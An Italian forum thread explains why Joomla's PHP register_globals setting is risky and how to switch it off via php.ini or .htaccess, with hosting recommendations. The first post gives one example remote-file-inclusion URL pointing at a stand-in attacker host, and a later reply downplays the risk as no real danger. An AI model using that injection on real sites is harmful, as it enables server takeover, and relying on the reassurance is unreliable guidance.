• Super User

    Dal forge di joomla:

    Register Globals
    Cosa fa?
    La funzione register_globals aiuta gli sviluppatori nella creazione di componenti. Essa infatti permette a tutti i valori che sono processati dallo script e li mette in variabili. Significa che
    index.php?foo=bar
    crea automaticamente la variabile $foo con il valore bar nello script index.php
    Perchè è un rischio? Principalmente perchè la funzione non controlla il valore. Così se vuoi sovrascrivere il path di Joomla usato per includere files, lo permette
    index.php?mos_config_livesite=http://bad.hacker.tld
    Ora l'index.php proverà ad includere questo file e caricherà un file dal server. Con questo script, l'intruso avrà accesso al tuo server.
    La funzione da sola non è un problema. Se controlli ogni variabile prima di usarne il contenuto, sei praticamente al sicuro, e ti aiuta (se sei uno sviluppatore). In Joomla questo è semplice. Per gli sviluppatori c'è una funzione chiamata mosGetParam(), che compie tutti i controlli per te ed è veramente semplice da usare. Se tutti gli sviluppatori usano questa funzione e non il register_globals, abbiamo veramente pochi problemi di sicurezza
    Come posso mettere il register_globals Off?
    Configurazione di Apache/Php
    Se hai accesso al file di configurazione del tuo server puoi scrivere
    register_globals = Off
    Devi avere un po di esperienza, o rischi che il server non risponda più
    file .htaccess
    In molti server, puoi configurare apache tramite i file .htaccess Questi file non possono essere letti dal web!
    Per creare questo file puoi creare un documento con blocco note o linux (non Word !) e inserire la linea
    php_flag register_globals off
    Se lo salvi nella cartella del tuo Joomla, metterai il tuo register_globals a off eliminando i rischi per la sicurezza
    php.ini
    Quando il file .htaccess non è accessibile, puoi usare il file php.ini
    La linea da inseirire o modificare è la seguente
    register_globals = off
    Una soluzione potrebbe essere quella di creare un file php.ini da mettere in tutte le cartelle o modificare il file php.ini del server.
    Se non hai accesso al php.ini devi richiedere al tuo provider di hosting se può metterti il register_globals a off.
    Se si rifiuta, è consigliabile cambiare hosting, in quanto si tratta di una forma di sicurezza basilare utilizzata da molti anni


  • User

    grazie mille sei stato esaustivo come sempre ed ora tutto mi è più chiaro, il mio Host è presso aruba secondo voi va bene per Joomla o mi consigliate qualcosa di diverso????
    Grazie ancora per l'aiuto!!


  • Super User

    Non è il massimo, ma i siti in joomla ci girano...
    certo, poi dipende da che sito devi metterci...


  • User

    Allora in realtà sono 2 i siti che devo costruire......
    Il primo è un semplice sito vetrina e quindi su quello non ho grossi problemi mentre il secondo è un negozio online ed ho paura che questa cosa possa darmi dei grattacapi in caso sapreste indicarmi un hosting sicuro!?!??
    Grazie mille!:vai::vai:


  • Super User

    Per il primo, come hai già capito da solo, puoi tranquillamente sfruttare il vantaggio economico di aruba. 😉

    Per il secondo, cercherei qualcosa di più professionale, ma non me la sento di fare nomi, in quanto, può capitare che alcuni utenti si trovino bene e altri no.
    😉


  • User Newbie

    Ciao a tutti,
    Intervengo nella discussione perché ho lo stesso problema: aruba mi ha risposto che non essendo su un server dedicato non posso andare a modificare il valore di Register Globals.
    Quindi mi sono posto queste domande:
    Tutti gli hosting condivisi hanno questo problema?
    Se non sono uno sviluppatore e uso solamente estensioni ufficiali o quantomeno ritenute molto affidabili, corro comunque qualche rischio?
    Qual'è il rischio effettivo di vedersi defacciato il sito se lascio Register Globals su ON?
    Grazie!


  • Super User

    ciao bizio e benvenuto nel Forum GT 😉

    Ormai la maggior parte dei provider lo imposta già di default, purtroppo aruba ancora no 😉


  • User Newbie

    Ti ringrazio per aver risposto.
    Il sito su cui ho installato joomla è aziendale, il passaggio su aruba è stato effettuato da qualche giorno. 30 euro non sono tanti, ma se dovessi rieffettuare un nuovo passaggio credo che qui non la prenderebbero troppo bene o_O 🙂 ...quanto rischio concretamente a lasciarlo su aruba? in altre parole: è così facile con Register Globals ON danneggiare un sito web?

    P.s.: non è che mi consiglieresti un buon provider per joomla, magari in MP?
    Grazie!


  • User Attivo

    Pochi provider lo hanno disabilitato di default ma ti danno comunque la possibilità di avere files php.ini che ti permettano di modificare il settaggio di register globals.


  • User Newbie

    ma quindi concretamente il mio rischio è alto oppure è solo un po' più alto della media? Perché se è veramente alto cambio mnt subito...
    Oltre al provider pubblicizzato da joomla.it, quali sono quelli che permettono il settaggio di register globals?


  • User Attivo

    Non hai reali pericoli, l'80% per cento dei siti Joomla ha register globals abilitato secondo me.

    Se vuoi un buon hosting, servizio completo e ottima assistenza (lo uso anch'io) prova hostagator.com
    C'è anche la possibilità di disabilitare register globals.

    Nel htaccess con loro puoi mettere:

    php_flag register_globals off
    php_flag mysql.allow_persistent off
    php_value max_execution_time 300
    php_value memory_limit 8M
    php_value post_max_size 20M
    php_value upload_max_filesize 20M
    oltre al resto, rewrite ecc.